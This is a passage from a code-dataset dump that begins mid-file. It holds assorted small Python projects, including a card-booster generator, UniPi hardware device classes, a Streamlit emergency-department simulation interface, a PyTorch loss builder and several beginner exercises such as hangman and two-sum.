rarity != \"marketing\":\n clean_booster.append(rarity)\n return clean_booster\n\n @staticmethod\n def generate_booster(set_code):\n set_code = set_code.upper()\n set = Set.get_set_by_code(set_code)\n booster = Set.booster_rarities(set['booster'])\n cards = []\n for rarity in booster:\n card_ids_used = [card['id'] if card and 'id' in card else 0 for card in cards]\n card = Card.get_random_card([\"cards.set_code='%s'\" % set_code, \"cards.rarity='%s'\" % rarity, \"cards.number <= %i\" % set['card_count'], \"cards.id not in (%s)\" % \",\".join(list(map(str, card_ids_used)))])\n cards.append(card)\n return cards\n\n @staticmethod\n def seed_data(reseed=False):\n with open('AllSets.json') as sets_file:\n set_data = json.load(sets_file)\n Set.seed_sets(set_data, reseed)\n sets = Set.get_sets([])\n return sets\n\n @staticmethod\n def seed_sets(set_data, reseed=False):\n included_sets = [\"MM3\", \"AKH\", \"HOU\", \"XLN\", \"IMA\", \"RIX\", \"A25\", \"DOM\"]\n for set_code, set in set_data.items():\n existing_sets = Set.get_sets([\"code='%s'\" % set_code])\n if set['code'] in included_sets:\n if not existing_sets:\n new_set = Set.create_set(set['name'], set_code, json.dumps(set['booster']), set['releaseDate'], len(set['cards']))\n if not existing_sets or reseed:\n Set.seed_cards(set['code'], set['cards'])\n\n # @staticmethod\n # def seed_lands(set_data):\n # included_sets = [\"ZEN\", \"UNH\", \"UGL\", \"LEA\", \"\"]\n # zen_full_arts = [195179, 201972, 201974, 195163, 201966, 201964, 201963, 195170, 201977, 201978, 195159, 195157, 201968, 201969, 201970, 201967, 195158, 201962, 201960, 195183]\n # unh_full_arts = []\n # ugl_full_arts = []\n # land_ids = []\n # for set_code, set in set_data.items():\n # if set['code'] in included_sets:\n # lands = [card for card in set['cards'] if card['id'] 
in land_ids]\n    #             Set.seed_cards(set['code'], lands)\n\n    @staticmethod\n    def seed_cards(set_code, card_data):\n        for card in card_data:\n            existing_cards = Card.get_cards([\"multiverse_id=%s\" % card['multiverseid']])\n            colors = json.dumps(card['colors']) if 'colors' in card else '[]'\n            mana_cost = card['manaCost'] if 'manaCost' in card else ''\n            number = int(re.sub(\"[^0-9]\", \"\", card['number']))\n            if not existing_cards:\n                new_card = Card.create_card(card['name'], card['multiverseid'], card['cmc'], colors, set_code, mana_cost, json.dumps(card['types']), card['rarity'].lower(), number)\n            elif not existing_cards[0]['colors'] or not existing_cards[0]['types'] or not existing_cards[0]['rarity'] or not existing_cards[0]['number']:\n                update_card = update_item('cards', [\"colors='%s'\" % colors, \"types='%s'\" % json.dumps(card['types']), \"rarity='%s'\" % card['rarity'].lower(), \"number=%i\" % number], params=[\"id=%i\" % existing_cards[0]['id']])\n","repo_name":"thomascmurphy/draft","sub_path":"flask_backend/app/models/set.py","file_name":"set.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"42353739282","text":"def tabla_multiplicar():\n    resultado = \"\"\n    for multiplicando in range(1, 11):\n        resultado += f\"Multiplication table of {multiplicando}:\\n\"\n        \n        for multiplicador in range(1, 11):\n            resultadomult = multiplicando * multiplicador\n            resultado += f\"{multiplicando} x {multiplicador} = {resultadomult}\\n\"\n        resultado += \"\\n\"\n    return resultado\n\ndef main():\n    print(tabla_multiplicar())\n\nif __name__ == \"__main__\":\n    main()","repo_name":"IES-Rafael-Alberti/1dawb-ejercicios-u2-alcinacarlos","sub_path":"src/ej22_07.py","file_name":"ej22_07.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"400789801","text":"\"\"\"Customizable colors used in the Shell\n\"\"\"\n\nfrom colorama import Fore, Back, Style\n\n\n# Help Command Colors\n\nHELP_USAGE_STYLE = Style.BRIGHT\nHELP_USAGE_FORE = Fore.GREEN\n\nHELP_TEXT_FORE = Style.DIM\n\nHELP_OPTION_DESCRIPTION_STYLE = Style.DIM\nHELP_OPTION_NAME_STYLE = Fore.YELLOW\nHELP_OPTION_HEADER_FORE = Fore.WHITE\nHELP_OPTION_HEADER_BACK = Back.MAGENTA\nHELP_OPTION_HEADER_STYLE = Style.BRIGHT\n\nHELP_ARGUMENT_DESCRIPTION_STYLE = Style.DIM\nHELP_ARGUMENT_NAME_STYLE = Fore.YELLOW + Style.BRIGHT\nHELP_ARGUMENT_CLASS_STYLE = Fore.CYAN\nHELP_ARGUMENT_ARROW_STYLE = Fore.RED + Style.BRIGHT\nHELP_ARGUMENT_HEADER_FORE = Fore.BLUE + Style.DIM\nHELP_ARGUMENT_HEADER_BACK = Back.LIGHTYELLOW_EX\nHELP_ARGUMENT_HEADER_STYLE = Style.NORMAL\n\nHELP_COMMAND_DESCRIPTION_STYLE = Style.DIM\nHELP_COMMAND_NAME_STYLE = Fore.YELLOW\nHELP_COMMAND_HEADER_FORE = Fore.WHITE\nHELP_COMMAND_HEADER_BACK = Back.BLUE\nHELP_COMMAND_HEADER_STYLE = Style.BRIGHT\n\nHELP_ALIASES_ALIAS_STYLE = Fore.WHITE + Style.DIM\nHELP_ALIASES_HEADER_FORE = Fore.WHITE\nHELP_ALIASES_HEADER_BACK = Back.CYAN\nHELP_ALIASES_HEADER_STYLE = Style.BRIGHT\n\n\n# Exception Colors\n\nUSAGE_ERROR_STYLE = Fore.RED + Style.BRIGHT\n\nCLICK_ERROR_STYLE = Fore.RED + Style.BRIGHT\n\nUNEXPECTED_ERROR_TEXT_STYLE = Fore.YELLOW\n\nPYTHON_ERROR_HEADER_FORE = Fore.WHITE\nPYTHON_ERROR_HEADER_BACK = Back.LIGHTRED_EX\nPYTHON_ERROR_HEADER_STYLE = Style.BRIGHT\nPYTHON_STACKTRACE_STYLE = Style.DIM\n\n\n# CMD Colors\n\nCOMMAND_NOT_FOUND_TEXT_STYLE = Style.DIM\nCOMMAND_NOT_FOUND_TEXT_FORE = Fore.YELLOW\n\nSUGGEST_TEXT_STYLE = 
Style.BRIGHT\nSUGGEST_TEXT_COLOR = Fore.CYAN\nSUGGEST_ITEMS_STYLE = Fore.YELLOW\n\nPROMPT_DEFAULT_TEXT = \"#ffffff\" #00ffff\nPROMPT_NAME = \"#009999\"\nPROMPT_SYMBOL = \"#999966\"\n\n\n# Completion Colors\n\nCOMPLETION_COMMAND_NAME = 'ansiblue'\nCOMPLETION_COMMAND_DESCRIPTION = 'fg=\\\"#5f00d7\\\"'\nCOMPLETION_ROOT_COMMAND_NAME = 'ansiblue'\nCOMPLETION_ROOT_COMMAND_DESCRIPTION = 'fg=\\\"#5f00d7\\\"'\n\nCOMPLETION_CHOICE_DEFAULT = 'ansiblack'\nCOMPLETION_CHOICE_BOOLEAN_TRUE = 'ansigreen'\nCOMPLETION_CHOICE_BOOLEAN_FALSE = 'style fg=\\\"#dc322f\\\"'\n\nCOMPLETION_OPTION_NAME = 'ansibrightmagenta'\nCOMPLETION_OPTION_DESCRIPTION = 'fg=\\\"#5f00d7\\\"'\n\nCOMPLETION_ARGUMENT_NAME = 'ansired'\nCOMPLETION_ARGUMENT_DESCRIPTION = 'fg=\\\"#5f00d7\\\"'\n\nCOMPLETION_LITERAL_TUPLE_TYPE = 'fg=\\\"#000087\\\"'\nCOMPLETION_LITERAL_TUPLE_TYPE_USED = 'fg=\\\"#5f0000\\\"'\nCOMPLETION_LITERAL_TUPLE_TYPE_CURRENT = 'fg=\\\"#5f00af\\\"'\n\n\n# Base Shell Command Colors\n\nSHELL_HISTORY_CLEARED_STYLE = Style.DIM\nSHELL_HISTORY_CLEARED_TRUE = Fore.GREEN\nSHELL_HISTORY_CLEARED_FALSE = Fore.RED + Style.BRIGHT\n\n\n# Lexer Colors\n\nPYGMENTS_NAME_HELP = '#afd700'\nPYGMENTS_NAME_EXIT = '#ff005f'\nPYGMENTS_NAME_SYMBOL = '#5faf87'\n\nPYGMENTS_NAME_SHELL = '#5faf00'\nPYGMENTS_NAME_COMMAND = '#afaf87'\nPYGMENTS_NAME_SUBCOMMAND = '#5f5fff'\nPYGMENTS_NAME_INVALIDCOMMAND = '#ff0000'\n\nPYGMENTS_OPTION = '#d75f5f'\n\nPYGMENTS_OPERATOR = '#ffaf00'\nPYGMENTS_KEYWORD = '#af0087'\n\nPYGMENTS_LITERAL_NUMBER = '#ffff5f'\nPYGMENTS_LITERAL_STRING = '#8a380f'\nPYGMENTS_LITERAL_STRING_LITERAL = '#1fad91'\n\nPYGMENTS_PARAMETER_CHOICE = '#3385ff'\n\n\n# Shell Prompt Style\n\ntry:\n from prompt_toolkit.styles import Style\n\n prompt_style = Style.from_dict({\n '': PROMPT_DEFAULT_TEXT,\n\n 'name': PROMPT_NAME,\n 'prompt': PROMPT_SYMBOL,\n\n 'pygments.text': PROMPT_DEFAULT_TEXT,\n 'pygments.name.help': PYGMENTS_NAME_HELP,\n 'pygments.name.exit': PYGMENTS_NAME_EXIT,\n 'pygments.name.symbol': PYGMENTS_NAME_SYMBOL,\n\n 'pygments.name.label': PYGMENTS_NAME_SHELL,\n\n 'pygments.name.invalidcommand': PYGMENTS_NAME_INVALIDCOMMAND,\n 'pygments.name.command': PYGMENTS_NAME_COMMAND,\n 'pygments.name.subcommand': PYGMENTS_NAME_SUBCOMMAND,\n\n 'pygments.name.attribute': PYGMENTS_PARAMETER_CHOICE,\n\n 'pygments.name.tag': PYGMENTS_OPTION,\n\n 'pygments.operator': PYGMENTS_OPERATOR,\n 'pygments.keyword': PYGMENTS_KEYWORD,\n\n 'pygments.literal.number': PYGMENTS_LITERAL_NUMBER,\n\n 'pygments.literal.string': PYGMENTS_LITERAL_STRING,\n 'pygments.literal.string.symbol': PYGMENTS_LITERAL_STRING_LITERAL\n })\nexcept: pass","repo_name":"xSlither/pretty-click-shell","sub_path":"pcshell/_colors.py","file_name":"_colors.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"44770914058","text":"'''\n UniPi2 primitive devices (DI, DO, AI, AO)\n------------------------------------------\n'''\n\nimport struct\nimport time\nimport datetime\n#import atexit\nfrom math import isnan, floor\n\nfrom tornado import gen\nfrom tornado.ioloop import IOLoop\nimport devents\nfrom devices import *\nimport config\nfrom spiarm import ProxyRegister\n\nclass Relay(object):\n pending_id = 0\n\n def __init__(self, circuit, arm, coil, reg, mask):\n self.circuit = circuit\n self.arm = arm\n self.coil = coil\n self.bitmask = mask\n self.reg = arm.get_proxy_register(reg)\n self.reg.devices.add(self)\n #arm.register_relay(self)\n\n def full(self):\n return {'dev': 'relay', 'circuit': 
self.circuit, 'value': self.value, 'pending': self.pending_id != 0}\n\n    def simple(self):\n        return {'dev': 'relay', 'circuit': self.circuit, 'value': self.value}\n\n    @property\n    def value(self):\n        try:\n            if self.reg.value & self.bitmask: return 1\n        except:\n            pass\n        return 0\n\n    def get_state(self):\n        \"\"\" Returns ( status, is_pending )\n            current on/off status is taken from last mcp value without reading it from hardware\n            is_pending is Boolean\n        \"\"\"\n        return (self.value, self.pending_id != 0)\n\n    @gen.coroutine\n    def set_state(self, value):\n        \"\"\" Sets new on/off status. Disable pending timeouts\n        \"\"\"\n        if self.pending_id:\n            IOLoop.instance().remove_timeout(self.pending_id)\n            self.pending_id = 0  # 0 = no pending timeout, matching the pending_id != 0 checks above\n        #yield self.mcp.set_masked_value(self._mask, value)\n        raise gen.Return(1 if self.reg.value & self.bitmask else 0)\n\n    def set(self, value=None, timeout=None):\n        \"\"\" Sets new on/off status. Disable pending timeouts\n        \"\"\"\n        if value is None:\n            raise Exception('Value must be specified')\n        value = int(value)\n        if not (timeout is None):\n            timeout = float(timeout)\n\n        #yield self.mcp.set_masked_value(self._mask, value)\n        self.arm.write_bit(self.coil, 1 if value else 0)\n\n        if timeout is None:\n            return (1 if self.reg.value & self.bitmask else 0)\n\n        def timercallback():\n            self.pending_id = 0\n            self.arm.write_bit(self.coil, 0 if value else 1)\n\n        self.pending_id = IOLoop.instance().add_timeout(\n            datetime.timedelta(seconds=float(timeout)), timercallback)\n        return (1 if value else 0)\n        #return (1 if self.mcp.value & self._mask else 0)\n\n\nclass Input():\n    def __init__(self, circuit, arm, reg, mask, regcounter=None, regdebounce=None):\n        self.circuit = circuit\n        self.arm = arm\n        self.bitmask = mask\n        self.reg = arm.get_proxy_register(reg)\n        self.regcounter1 = None if regcounter is None else arm.get_proxy_register(regcounter) \n        self.regcounter2 = None if regcounter is None else arm.get_proxy_register(regcounter+1) \n        self.regdebounce = None if regdebounce is None else arm.get_proxy_register(regdebounce)\n        self.reg.devices.add(self)\n        # the counter/debounce registers are optional; only register with the ones that exist\n        if self.regcounter1 is not None:\n            self.regcounter1.devices.add(self)\n            self.regcounter2.devices.add(self)\n        if self.regdebounce is not None:\n            self.regdebounce.devices.add(self)\n        #self.counter_mode = \"rising\"\n        self.counter_mode = \"disabled\"\n        #if counter_mode in [\"rising\", \"falling\", \"disabled\"]:\n        #    self.value = 0\n        #    self.counter_mode = counter_mode\n        #else:\n        #    self.counter_mode = 'disabled'\n        #    print 'DI%s: counter_mode must be one of: rising, falling or disabled. Counting is disabled!' 
% self.circuit\n\n    @property\n    def debounce(self):\n        try: return self.regdebounce.value\n        except: pass\n        return 0\n\n    @property\n    def value(self):\n        if self.counter_mode != \"disabled\": return self.counter\n        try:\n            if self.reg.value & self.bitmask: return 1\n        except:\n            pass\n        return 0\n\n    @property\n    def counter(self):\n        try:\n            r1 = self.regcounter1.value\n            r2 = self.regcounter2.value\n            return r1 + 0x10000*r2\n        except:\n            return 0\n\n    def full(self):\n        return {'dev': 'input', 'circuit': self.circuit, 'value': self.value,\n                'debounce': self.debounce, 'counter_mode': self.counter_mode,\n                'counter': self.counter }\n\n    def simple(self):\n        return {'dev': 'input', 'circuit': self.circuit, 'value': self.value }\n\n    def set(self, debounce=None, counter=None):\n        if not (debounce is None):\n            if not(self.regdebounce is None):\n                self.arm.write_regs(self.regdebounce.regnum,debounce)\n            #devents.config(self)\n        if not (counter is None):\n            if not(self.regcounter1 is None):\n                self.arm.write_regs(self.regcounter1.regnum,(0,0))\n            #devents.status(self)\n\n    def get(self):\n        \"\"\" Returns ( value, debounce )\n            current on/off value is taken from last value without reading it from hardware\n        \"\"\"\n        return (self.value, self.debounce)\n\n    def get_value(self):\n        \"\"\" Returns value\n            current on/off value is taken from last value without reading it from hardware\n        \"\"\"\n        return self.value\n\n\nclass AnalogOutput():\n\n    def __init__(self, circuit, arm, reg):\n        self.circuit = circuit\n        self.reg = arm.get_proxy_register(reg)\n        self.reg.devices.add(self)\n        self.factor = 10.50 / 4095\n        self.arm = arm\n\n    @property\n    def value(self):\n        try:\n            return self.reg.value * self.factor # 3.558*3\n        except:\n            return 0\n\n    def full(self):\n        return {'dev': 'ao', 'circuit': self.circuit, 'value': self.value}\n\n    def simple(self):\n        return {'dev': 'ao', 'circuit': self.circuit, 'value': self.value}\n\n    @gen.coroutine\n    def set_value(self, value):\n        valuei = int(float(value) / self.factor)\n        self.arm.write_regs(self.reg.regnum,valuei)\n        raise gen.Return(value)\n\n    def set(self, value=None, frequency=None):\n        valuei = int(float(value) / self.factor)\n        self.arm.write_regs(self.reg.regnum,valuei)\n        return value\n\n\nclass AnalogInput():\n\n    def __init__(self, circuit, arm, reg, correction = None):\n        self.circuit = circuit\n        self.reg = arm.get_proxy_register(reg)\n        self.reg.devices.add(self)\n        self.arm = arm\n        self.correction = 1 if correction is None else correction\n\n    @property\n    def value(self):\n        try:\n            return self.reg.value * 10.65 / 4095 * self.correction\n        except:\n            return 0\n\n    def full(self):\n        return {'dev': 'ai', 'circuit': self.circuit, 'value': self.value}\n\n    def simple(self):\n        return {'dev': 'ai', 'circuit': self.circuit, 'value': self.value}\n\n\n    @property # temporary!!\n    def voltage(self):\n        return self.value\n\n\n\n","repo_name":"chrischnweiss/evok","sub_path":"evok/unipi2.py","file_name":"unipi2.py","file_ext":"py","file_size_in_byte":6893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
{"seq_id":"27413931204","text":"from django.urls import path\n\nfrom accounts.api import UserDetailsView, Register, Activate, GetOrders, CancelOrder\n\nurlpatterns = (\n    path(\"api/v1/user/\", UserDetailsView.as_view()),\n    path(\"api/v1/get_orders/\", GetOrders.as_view(), name='get_orders'),\n    path(\"api/v1/cancel_order/<int:order>/\", CancelOrder.as_view(), name='cancel_order'),\n\n    path(\"api/v1/register/\", Register.as_view(), name='register'),\n    path(\"api/v1/activate/<str:uidb64>/<str:token>/\", 
Activate.as_view(), name='activate'),\n)\n","repo_name":"kozlyuk/envista","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16147966412","text":"import random\n\nwith open(\"/home/davo/testfile\", \"r+\", encoding=\"utf - 8\") as f:\n guess_word = random.choice([line for line in f]).strip()\n\n\ndef find_index(word, value):\n start = -1\n indexes = []\n while True:\n try:\n ind = word.index(value, start + 1)\n indexes.append(ind)\n start = ind\n except ValueError:\n break\n return indexes\n\n\ndef hangman(word):\n guess_limit = 5\n output = \"-\" * (len(word))\n\n while guess_limit != 0:\n print(output)\n user_input = input(f\"Guess the word. {guess_limit} mistakes left: \").lower()\n print(f\"Guess a letter: {user_input.upper()}\")\n if user_input in word:\n temp_position_list = find_index(word, user_input)\n for pos in temp_position_list:\n temp = list(output)\n temp[pos] = user_input\n output = \"\".join(temp)\n else:\n guess_limit -= 1\n if guess_limit == 0:\n print(\"You lost the game\")\n elif word == output:\n print(\"You won the game\")\n break\n\n\nhangman(guess_word)\n","repo_name":"Davitkhachikyan/HTI-1-Practical-Group-2-Davit-Khachikyan","sub_path":"homework_6/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17955850810","text":"# from numpy.lib.arraysetops import ediff1d\nimport sys\nsys.path.insert(0, '../EDSIM-BackEnd/')\n\nimport streamlit as st\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom bokeh.palettes import Spectral4\nfrom bokeh.plotting import figure, output_file, show\nimport ED_Model2 as Model\nimport Statistics as s\n\n#Title at the top \nst.title('Emergency Department Simulation')\n\n# File Upload/Processing\nfile = st.file_uploader('Upload .csv file with data')\ndef process_file(file):\n st.write(file)\n df = pd.read_csv(file)\n st.write(df)\nif st.button('Process file'):\n process_file(file)\n\n#Inputting Fields/ Sliders for each category \ncol1, col2, col3 = st.columns(3)\ncol2.subheader('Resource Allocation')\ncol3.subheader('Patient Inter-Arrival Times (mins)')\ncol1.subheader('Process Service Times (mins)')\nwith col2:\n docs = st.number_input('Number of Doctors', 1, 5, 2)\n nurse = st.number_input('Number of Nurses', 1, 5, 2)\n beds = st.number_input('Number of Beds', 1, 5, 2)\n resbeds = st.number_input('Number of Resuscitation Beds', 1, 5, 2)\nwith col3:\n walkInP = st.number_input('Walk-In Patients', 1, 1000, 478)\n AmbulanceP = st.number_input('Ambulance Patients', 1, 50, 9)\nwith col1:\n CTASass = st.number_input('CTAS Assessment', 1, 50, 42)\n Priorityass = st.number_input('Priority Assessment', 1, 50, 23)\n Initialass = st.number_input('Initial Assessment', 1, 50, 42)\n Dischargeass = st.number_input('Discharge Assessment', 1, 50, 23)\n Treatment = st.number_input('Treatments', 1, 50, 20)\n Bedass = st.number_input('Bed Assignment', 1, 50, 32)\n Resus = st.number_input('Resuscitations', 1, 50, 19)\n Registration = st.number_input('Registrations', 1, 50, 49)\nst.header('Simulation Parameters')\nsimPar_duration = st.number_input('Duration (mins)', 1, 30, 10)\nsimPar_iterations = st.number_input('Iterations', 5, 40, 18)\nsimPar_warmUp = st.number_input('Warm Up Period', 1, 30, 10)\n\nsimParameters = {\n 'resCapacity': {\n 
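# staffing/bed pools taken from the sidebar widgets (keys assumed to match what Model.runSim consumes)\n        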
'doctor':docs, \n        'nurse':nurse,\n        'beds':beds,\n        'rBeds':resbeds, \n\n    }, \n    'pInterArrival':{\n        # inter-arrival counts keyed by arrival type (each UI count mapped to its matching key)\n        'ambulance': AmbulanceP, \n        'walkIn': walkInP\n\n    }, \n    'serTimes':{\n        'priorAssessment': Priorityass, \n        'ctasAssessment':CTASass, \n        'registration':Registration, \n        'bedAssignment':Bedass,\n        'initialAssessment':Initialass,\n        'treatment':Treatment, \n        'discharge':Dischargeass,\n        'resuscitation':Resus \n    }, \n    'ctasDist':{\n        'ambulance': {\n            1:0.5, \n            2:0.2, \n            3:0.3, \n            4:0.1, \n            5:0\n            \n        }, \n        'walkIn':{\n            1:0.3, \n            2:0.2, \n            3:0.1, \n            4:0.1, \n            5:0.1\n        }\n\n    }, \n    'iter':simPar_iterations,\n    'warmUp':simPar_warmUp, \n    'length':simPar_duration\n}\n\ndef los_chart(meanLOS):\n    meanLOSforCTAS1 = s.getDataByCTASLevel(meanLOS, 1)\n    meanLOSforCTAS2 = s.getDataByCTASLevel(meanLOS, 2)\n    meanLOSforCTAS3 = s.getDataByCTASLevel(meanLOS, 3)\n    meanLOSforCTAS4 = s.getDataByCTASLevel(meanLOS, 4)\n    meanLOSforCTAS5 = s.getDataByCTASLevel(meanLOS, 5)\n\n    p = figure(width=800, height=250)\n    p.title.text = 'Click on legend entries to hide the corresponding lines'\n\n    # bokeh's line glyph needs explicit x values; use the run IDs (0..n-1)\n    p.line(x=list(range(len(meanLOSforCTAS1))), y=meanLOSforCTAS1, line_width=2, color='firebrick', alpha=0.8, legend_label='Los for CTAS 1')\n\n    p.legend.location = \"top_left\"\n    p.legend.click_policy=\"hide\"\n\n    fig, axs = plt.subplots(5,figsize=(10,17))\n    \n    # Subplot for each CTAS level\n    axs[0].plot(meanLOSforCTAS1, 'C0')\n    axs[0].set_xlabel('Run ID')\n    axs[0].set_ylabel('Mean length of stay (min)')\n    axs[0].set_title('Mean Patient Length of Stay per Run ID (CTAS 1-5)')\n\n    axs[1].plot(meanLOSforCTAS2, 'C1')\n    axs[1].set_xlabel('Run ID')\n    axs[1].set_ylabel('Mean length of stay (min)')\n\n    axs[2].plot(meanLOSforCTAS3, 'C2')\n    axs[2].set_xlabel('Run ID')\n    axs[2].set_ylabel('Mean length of stay (min)')\n\n    axs[3].plot(meanLOSforCTAS4, 'C3')\n    axs[3].set_xlabel('Run ID')\n    axs[3].set_ylabel('Mean length of stay (min)')\n\n    axs[4].plot(meanLOSforCTAS5, 'C4')\n    axs[4].set_xlabel('Run ID')\n    axs[4].set_ylabel('Mean length of stay (min)')\n\n    return p\n\n\n\n#The graphs being displayed/modeled\n\nif st.button('Run Simulation'):\n    # Gets results\n    results_df = Model.runSim(simParameters)\n    #Group dataframe by Run ID and CTAS Level\n    means = s.meanByGroup(results_df)\n\n    #Mean LOS of grouped dataframe\n    meanLOS = s.meanParByCTASperRun(means,'los')\n    #create charts (use a distinct name so the los_chart function is not shadowed)\n    chart = los_chart(meanLOS)\n    # Shows the charts\n    st.bokeh_chart(chart, use_container_width=True)\n    # Display the results (text)\n    summary = s.calculateSummary(results_df)\n    st.write(summary)\n\n# Download .txt file \n\n#IMPLEMENT HEREEEEEEEEEEEEEEEe\n\n\n\n","repo_name":"SarmadTanveer/EDSIM","sub_path":"EDSIM-FrontEnd/streamlit_ed_model.py","file_name":"streamlit_ed_model.py","file_ext":"py","file_size_in_byte":5003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"42999567886","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n * ========================================================================\n *\n *       Filename: Day 4\n *\n *    Description: Overlapping\n *\n *        Version: 1.0\n *        Created: 01/04/20 18:28:09\n *       Revision: none\n *\n *         Author: Antonio Molina Jiménez (AMJ), amj.com@gmail.com\n *        Company:\n *\n * ========================================================================\n\"\"\"\n\n\ndef main():\n    with open('input4.txt', 'r') as f:\n        lines = f.readlines()\n    overlaps = 0\n    partial = 0\n\n    for i in lines:\n        pair = i.split(',')\n        r1 = pair[0]\n        r2 = pair[1]\n\n        r1_ini = int(r1.split('-')[0])\n        r1_end = 
int(r1.split('-')[1])\n\n        r2_ini = int(r2.split('-')[0])\n        r2_end = int(r2.split('-')[1])\n\n        if (r1_ini <= r2_ini) and (r1_end >= r2_end):\n            # Overlap r1_ini....r2_ini...r2_end...r1_end\n            overlaps = overlaps + 1\n        elif (r1_ini >= r2_ini) and (r1_end <= r2_end):\n            # Overlap r2_ini....r1_ini...r1_end...r2_end\n            overlaps = overlaps + 1\n        elif (r1_ini <= r2_ini) and (r1_end >= r2_ini):\n            # Overlap r1_ini....r2_ini...r1_end...r2_end\n            partial = partial + 1\n        elif (r2_ini <= r1_ini) and (r2_end >= r1_ini):\n            # Overlap r2_ini....r1_ini...r2_end...r1_end\n            partial = partial + 1\n\n    total = overlaps + partial\n\n    print(f\"Part 1: There are {overlaps} full overlaps\")\n    print(f\"Part 2: There are {total} total overlaps\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"amjdev/AdventOfCode2022","sub_path":"Day 4/Day4.py","file_name":"Day4.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"2449410413","text":"matriz = [[],[],[]]\r\n\r\nparT = 0\r\ncol3 = 0\r\nmai2 = 0\r\n\r\nfor i in range (0,3):\r\n    for c in range (0,3):\r\n        x = int(input(f'Enter a value for position {i,c}: '))\r\n        matriz[i].append(x)\r\n        if x % 2 == 0:\r\n            parT += x\r\n\r\nfor d in range (0,3):\r\n    col3 += matriz[d][2]\r\n\r\nmai2 = matriz[1][0]\r\n\r\nfor e in range (1,3):\r\n    if matriz[1][e] > mai2:\r\n        mai2 = matriz[1][e]\r\n\r\nprint('-'*40)\r\n\r\nfor a in range (0,3):\r\n    for b in range (0,3):\r\n        print(f'[ {matriz[a][b]} ]',end=\"\")\r\n        if b == 2:\r\n            print('\\n',end=\"\")\r\n\r\nprint(f'The sum of the even values is {parT}')\r\nprint(f'The sum of the values in the third column is {col3}')\r\nprint(f'The largest value in the second row is {mai2}')\r\n","repo_name":"jvjzn/PythonExercicios","sub_path":"ex095-matriz.py","file_name":"ex095-matriz.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"18149296817","text":"def average(array):\n    set_lst = list(set(array))\n    num = len(set_lst)\n    sum_lst = sum(set_lst)\n\n    avg = sum_lst/num\n    return avg\n\nif __name__ == '__main__':\n    n = int(input())\n    arr = list(map(int, input().split()))\n    result = average(arr)\n    print(result)","repo_name":"Benson1198/31-Days-of-CP","sub_path":"Day 16/sets(Hackerrank).py","file_name":"sets(Hackerrank).py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"7915294044","text":"import torch\nfrom .lambdaloss import LambdaLoss\nfrom .focalloss import FocalLoss\nfrom .ensemble_loss import Ensemble_BCELoss,Ensemble_MSELoss\n\ndef build_loss_fn(loss_name, loss_cfg):\n    if loss_name == 'LambdaLoss':\n        return LambdaLoss()\n    elif loss_name == 'FocalLoss':\n        return FocalLoss(**loss_cfg.kwargs)\n    elif loss_name == 'Ensemble_BCELoss':\n        return Ensemble_BCELoss(**loss_cfg.kwargs)\n    elif loss_name == 'Ensemble_MSELoss':\n        return Ensemble_MSELoss(**loss_cfg.kwargs)\n    else:\n        loss_fn = getattr(torch.nn,loss_name)\n        return loss_fn(**loss_cfg.kwargs)\n\nclass CombinedLossEvaluator(object):\n    \"\"\"\n    Combines multiple weighted loss evaluators into a single callable\n    \"\"\"\n    def __init__(self, loss_evaluators, loss_weights):\n\n        self.loss_evaluators = loss_evaluators\n        self.loss_weights = loss_weights\n    \n    def __call__(self, pred_results, gt, **kwargs):\n        comb_loss_dict = {}\n        for loss_name, loss_evaluator in self.loss_evaluators.items():\n            loss = 
loss_evaluator(pred_results,gt)\n            weight = self.loss_weights[loss_name]\n            if isinstance(loss,dict):\n                # an evaluator may return a dict of sub-losses: weight each entry and merge it into the result\n                comb_loss_dict.update({k:v*weight for k,v in loss.items()})\n            else:\n                comb_loss_dict[loss_name] = loss*weight\n        return comb_loss_dict\n\ndef build_loss_evaluator(cfg):\n    loss_evaluators = dict()\n    loss_weights = dict()\n    loss_dict = cfg.model.losses.copy()\n    for loss_name,loss_cfg in loss_dict.items():\n        loss_evaluator = build_loss_fn(loss_name,loss_cfg)\n        loss_evaluators[loss_name] = loss_evaluator\n        loss_weights[loss_name] = loss_cfg.weight\n    return CombinedLossEvaluator(loss_evaluators,loss_weights)\n","repo_name":"William-Zhanng/SenseXAMP","sub_path":"Ampmm_base/models/losses/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"}
{"seq_id":"71876947688","text":"from typing import List\n\n\nclass Solution:\n    def twoSum(self, nums: List[int], target: int) -> List[int]:\n        seen = {}\n        for key, num in enumerate(nums):\n            remaining = target - num\n\n            if remaining in seen:\n                return [key, seen[remaining]]\n\n            seen[num] = key\n\n\nsolution = Solution()\nprint(solution.twoSum([3, 3], target = 6))","repo_name":"nikpopesku/leetcode","sub_path":"python/0-99/1_two_sum.py","file_name":"1_two_sum.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
